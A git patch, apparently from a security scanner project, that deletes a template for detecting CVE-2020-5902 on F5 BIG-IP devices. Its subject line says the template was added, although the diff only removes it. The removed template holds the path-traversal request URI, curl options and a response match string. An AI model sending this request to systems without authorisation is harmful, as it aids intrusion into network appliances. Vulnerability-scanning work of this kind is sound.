From 7da27545a1d0a4cb170dc04fa42ea312518c3ce2 Mon Sep 17 00:00:00 2001 From: "@xer0dayz" <1n3@hushmail.com> Date: Sun, 5 Jul 2020 09:38:27 -0700 Subject: [PATCH] * v8.6 - Added CVE-2020-5902 F5 BIG-IP RCE sc0pe template --- .../CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution.sh | 9 --------- 1 file changed, 9 deletions(-) delete mode 100644 templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution.sh diff --git a/templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution.sh b/templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution.sh deleted file mode 100644 index 7b444c2..0000000 --- a/templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution.sh +++ /dev/null @@ -1,9 +0,0 @@ -AUTHOR='@xer0dayz' -VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution' -URI='/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp' -METHOD='GET' -MATCH='divGeneralRemoteSettingsTable' -SEVERITY='P1 - CRITICAL' -CURL_OPTS="--user-agent '' -s -L --insecure" -SECONDARY_COMMANDS='' -GREP_OPTIONS='-i' \ No newline at end of file